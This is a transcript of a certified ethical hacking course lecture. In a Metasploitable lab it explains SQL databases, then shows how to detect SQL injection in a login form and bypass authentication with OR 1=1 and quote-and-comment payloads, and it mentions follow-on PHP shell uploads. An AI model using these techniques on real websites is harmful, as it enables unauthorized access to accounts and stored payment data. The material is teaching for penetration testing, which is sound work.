EC Council CEH 312-50 V11 – Website Hacking – SQL Injection Vulnerabilities part 1
- What is SQL?
In this lecture and the next few lectures we’re going to be talking about a popular type of vulnerability is called SQL injections. Before we start talking about how this alchemist and how to exploit it, let’s first learn what SQL is now for. If you’re getting a pen test on a certain website, chances are this website is a little bit bigger than small all our websites, so it’s probably using a database. Most websites other than very simple websites use databases. The databases are used to store data, so they store usernames passwords, news articles, blog posts, pictures. Anything that happens on the website literally is stored on a database and the web application queries the database and then displays the data to you or to the users on screen.
When the users do something, it will either update, delete or modify the data that exists in the database. This interaction between the web application and the database happens using a language called SQL. So let me show you what I mean by a database. This is just an example. I’m not hacking anything. I’m literally just going to log in to the database that is installed on our Metasploitable machine and then we’re just going to see what’s being stored on it. So I’m not doing any hacking. There is nothing here, nothing fancy, just logging into My SQL and then I’m putting the username is root and the Metasploitable doesn’t use a password for the root, which is really bad, but obviously it’s a vulnerable system.
So I’m just going to log in and I’m not hacking anything, I’m not doing any SQL injections. This is just the terminal for My SQL which the web application would use to interact with the database. So I’m just trying to show you what I mean by databases and what’s saved in there. So the first thing I’m going to do is I’m just going to type in show databases and that will show us the databases that exist on our target server and we can see that we have the information schema. This is a default database that holds default information about all the other databases. So this one gets installed by default when you install MySQL. The rest have been installed for each web application. So we can see, we have one for Tikiwiki, we have one for OS Ten and that’s for this one metal day.
We also have one called MySQL, we have one called Metasploit and one for Dvwa which is the one that we’ve been using the web application. So you can see for each web application we actually have a database and this database holds the information that is used by that web application.Let me show you what’s in there. So I’m going to use the OS Ten database. So this is the one that is again, this is the one for Matilde for this web application. And we can see the tables. So each database has a table, tables and in the tables there is information. So I’m going to say show tables to see the tables that we have. And you can see we have a table for accounts, so you can assume that this table has information about the usernames passwords and information about the users.
We have a table for blogs, so probably has the blog inputs, the posts and the comments. In there you can see captured data, credit cards, so there’s a table that contains credit cards. Now this is huge for shopping websites. They actually would have credit cards table and the information for the credit cards would be stored there. Basically the database will store everything, all the data that is used on the website because they don’t get stored on files, it’s not efficient. So let’s have a look at the accounts. And if I just say select so this is exactly how the web application would be retrieving information from the database. It will be selecting stuff updating or deleting. So I’m doing a select statement here.
Again, this is not hacking, I’m not doing anything, just selecting stuff. And I’m going to select star, which means everything from accounts. And as we can see, we have the account ID, the username, the password and then the signature for the person and if that person is an admin. Now these columns depend on the table, so it’s actually the person who designs the database, designs the tables, the columns as well, and then the data gets inserted by the web application. So we can see that we have a user called Admin and their password is admin pass.
We can see we have a user called Adrian and their password is some password. So this is just to show you what databases look like and just to get a feel on it. Because in the future videos we’re going to try to exploit these databases and have access similar to this. So I just logged in with a username and a password. Now usually you wouldn’t have access like this, only the web admin would have that access. Future videos, we’re going to try to run some attacks in order to gain access similar to this, so that we’ll have full control over the database, so that we can read stuff and see if we can write or modify things.
- Dangers of SQL Injection Vulnerabilities
So I just want to highlight why SQL injections are so important and so dangerous. The reason behind that is they are found. You can find them everywhere, any play. A lot of places, a lot of big websites have these kind of exploits and like things like Yahoo, Google had them, they’re very hard to protect against and it’s very easy to make a mistake to make these exploits exploits available for exploitation. The other reason that they’re very dangerous is that they give you access to the database. In many scenarios if you find an SQL injection, you really don’t need to upload a PHP shell or get a reverse connection. There is really no point of uploading stuff and then increasing the danger of being caught.
Because if you have access to the database, as we see in here, you pretty much have everything you need. You have usernames passwords, you can log in with normal username and password as a normal user, or if you’re looking for a sensitive data, we can see that we’ve had access to credit cards, you pretty much can do anything you want, so there’s really no point of trying to further exploit the system. If you found an SQL injection, bingo, that’s all you need really. In many scenarios we actually use a PHP shell to gain access to the database and see if we can read it. Like say for example, if you managed to upload a PHP shell on the server, on this server that is exploitable, but then you couldn’t access the database.
There isn’t much that you can see. You can’t see credit cards, you can’t see username and passwords. Yeah, you have control over the server, but you can’t read stuff. So sometimes when you upload a PHP shell, the next step is I need to gain access to the database. Another thing is they can be used to do many things. So if you manage to find an SQL injection in a website that is not your target, so it’s not the one that you’re targeting, but it’s in the same server, then you can use it to read files outside the WW root. So similar to file inclusion vulnerabilities, you can use the admin, the username and password for the admin and see if you can upload stuff. Usually the admin can upload a lot of things instead of just images.
And then you can upload a PHP shell or a backdoor from there, and then from there navigate to your target computer or to the target website, sorry. Or you can actually in some cases you can use it to upload a PHP shell. If you can use this an app SQL injection to upload a PHP shell. So basically SQL injections can be used as file inclusion vulnerabilities, they can be used as file upload vulnerabilities and also they’ll give you access to the whole database. That’s why they are very, very dangerous and very useful. If you manage to find one.
- Discovering SQL injections In POST
Now to try and discover SQL injections, you need to browse through your target and try to break each page. So whenever you see a text box or a parameter on this form, for example, page PHP, then something is equal to something. Try to inject stuff here. So try to use a single quote, try to use an and or the order by statement to break the page and make it look different. So I’m going to show you here an example and I’m going to go into the login page first right here and it’s asking me to log in. Now I’ve actually registered with my own name so you can just go in here and register. I have a username called Zade and a password with 123456. So first I’m going to log in just to show you.
So my username is Zad and my password is 123456 and now I’m logged in as Zay. Then my signature was AA, just not really, just like as a test. So I’m going to log out and we’re back at the login page right here we have the page so you can try to inject in that, but we’ll get into that later. So at the moment we’re having an example of injecting into text boxes so you can try to inject into the name and into the password. So I’m going to put my name as Zade and I’m going to put a single quote. So I’m putting this sign into my password. So let’s see if we can break it. And as you can see now there is an error being displayed to us and it doesn’t look like a normal error, it looks like it’s a database error. And usually you’d be very lucky if you get an error like this.
Now usually the error won’t be as informative as this. Sometimes you’ll just see that the page is not acting as it’s expected, as you expected. Sometimes it’ll just be a page that does not look as it should. For example, if it’s a news page, maybe it will have the article missing, or if it’s a blog it will have one of the posts missing or different kind of posts. So you need to keep an eye on what’s changing. In this example, we are actually getting a really nice error telling us which file it has and it’s telling us that there’s an error in the statement and the error near the quotation mark that we added and it also tells us the statement that’s been executed.
This is really good for learning because now we can see what’s the statement that the system is trying to run and the system is trying to do a select star. So it’s trying to select everything from accounts where the username is equal to Zade and the password is equal to a single quote. And note that the system, the web application is already adding quotes around the name. So when I said Zade, it added zade between two quotes and it added the single quote that I added between another two quotes. So that’s why we have three quotes right here. So from this we can it’s like 70% of the target website has an SQL injection. We’re still not sure if it can execute what we wanted to do. So can I actually inject code and get it to be executed? Let’s see if we can do that.
So the username is going to be zade again. And what I’m going to do with the password, I’m going to put my password, so I’m going to put 123456 and then I’m closing it. So I’ll tell you why I’m closing it. Because the current statement in the system is it’s select star from to zade and is equal to, and it’s going to open a single quote by itself. So let’s call this s password. So we’re treating this as a variable and it takes in whatever I put in here, whatever I’m going to put in this box. And it’s going to insert it instead of the s password, which is a variable. So I’m giving you an idea. So you need to be able to imagine this happening. So it’s taking whatever I put in there and it’s going to put it between two single quotes and it’s going to be inserted in there and executed on the system.
So what I’m doing is I’m going to put 123456 and I’m going to add the quote myself. So what I’m going to do right now, the code is going to be like this. So it’s going to select this and password is equal to that. And I have two quotes right now, okay. And then what I’m going to do is I’m going to say and one is equal to one. So one is equal to one. And I’m just trying to see if it’s going to execute what I wanted to do. So my statement right now is it’s going to be select star from account where username is equal to zade and password is equal to 123456. And note I’m going to be inserting this myself and one’s equal to one. One problem that the system’s going to complain about is that we have an extra quote here because I’m going to be inserting this myself in the text box.
So it’s going to be complaining about this. It’s going to say this is an open code and it never has been closed. So what I’m going to do is I’m going to add the comment. And when you add a comment, basically everything that comes in after the comment will not be executed. I’m going to use the hash as the comment. So anything that comes in after the hash, the system is going to ignore. So what I’m going to inject now is going to be this, and one is equal to one and this. So as I said, usually what you have here, you have our password or depending on what the programmer called it, but we’re just imagining this. And I’m going to be inserting this inside. So when you do that and you insert it inside, this is what the code is going to look like.
So it’s going to look like the right username, the right password, and one is equal to one, which is true. And then it’s going to ignore this quote right here. So if we paste this, we should be able to log in. It should allow me to log in. And perfect, we were able to log in and username is Zade. So far we haven’t done anything, but this kind of shows us that is it running our code. Let’s try a different thing now. Let’s try to add a false statement. So what we did, we did one equal one and that was correct and it executed what we wanted. Let’s try one equals two and this is false. So I have the right password and I have the right username, but I either do and one is equal to two. And this should be wrong because it’s false.
One is not equal to two and I’m using an and so everything has to be true. So it should give me an error even though I’m going to put the right username and I’m going to put the right password. So I’m putting 123456 and one is equal to two. So it’s going to be like, oh, this is wrong. And as you can see, it’s given me an authentication error, bad username or password, even though I’m given the right password and the right username. So this confirms that this website is actually injecting anything we want in the password. So we can use the password field to inject SQL code and it’s is always going to be on this form. So we’re going to put a password and you’re going to put your code here. So I’m just going to put it in capital code here because we’re going to put any password, close the quote and then put the code that we want to execute on the system right here. And it’s going to be executed on the target system.
- Bypassing Logins Using SQL injection
Okay, so now we know that we can put any code we want in here and it’s going to be executed on the system. So let’s have another look now at the statement. So the statement says select star from accounts where username is equal to the username that we put here and password is equal to the password that we put there. Let’s see if we can use that to log in without using a password, without even knowing the password. And I’m going to be doing that with the admin. So the admin, the username is going to be admin and I don’t know what the password is for the admin. So what I’m going to do, I’m just going to put anything, so nothing really, any random password and in the code, what I should run here we were doing and one is equal to one and or stuff.
So what I’m going to do is I’m going to do or instead of, and I’m going to say one is equal to one. So what’s our code is going to be once I run this, once I inject this, this is going to go in here like we were doing before. So our code is going to look like this. So it’s going to be select star form accounts where username is equal to admin and password is equal to AAA. Now this is wrong or one is equal to one, which is right. So anytime you have an R, if the or condition is right, everything is right. That’s the way R statement works. So select star form accounts where username is equal to admin. Okay? Username is equal to admin and password is equal to IAA that’s wrong.
Or one is equal to one. Okay, I’ll accept that and then it’s actually going to execute it and let us log into the admin without even knowing the password for the admin. So let’s try to inject this now. And as you can see, I was able to log in as admin and monkey is the signature for the admin. Now, bypassing logins can be done in so many ways depending on the code that’s written on the page and depending on the way you want to do it and how you’re imagining the code. In a lot of the cases when you put the single quote here, you won’t see this message. Sometimes you do see it, which makes your job so much easier. If you don’t, then you kind of need to guess what it looks like. So I’m going to show you another example of bypassing.
Instead of injecting the code like this, the adminparameter is actually injectable as well as you’ve seen when I put the single quote, the admin parameter is injectable exactly the same way as the password. So we can inject code in the username as well. And what I’m going to do now, so let’s have a look on this and I’m just going to reset it to the way it would usually look like. And the username and the password are the fields that whatever you put in here are going to be substituted in the username and the password. So let’s try to inject something in the username. And what I’m going to say is I’m going to say username is equal to admin. And then I’m going to close the quote myself and then I’m going to add a comment.
So my statement, when I run this statement, it’s going to look like this. And I’m actually just going to copy it here. And when I put this code in here in my name, it’s going to inject that in there. So this is what the code is going to look like. It’s going to select star from accounts where username is equal to admin. I closed the quote myself here using this right there. And then I’m adding a comment. So basically all of this is not even going to be executed. So the code is going to be this. It’s going to be select star from accounts where username is equal to admin and it’s going to let me log in without even entering anything in the password. So let’s do this. I’m going to put my username as admin and I close the quote and add a comment.
And then you can put any password you want to read. I’m just going to put number one and I’m going to log in. And as you can see, I managed to log in as admin. So again, this is black box testing. So you don’t really see the code in many cases. You want to be playing around with it and see how it works with you. But the main thing is you want to test if the SQL injection exists and you’d use that using the method we showed you in the previous video. So try a single quote, try the ant statement. Try a true ant statement. So one is equal to one and then a false ant statement. So one is equal to zero or two is equal to zero. And if they work as expected, then your target has an SQL injection and you can start playing around with it.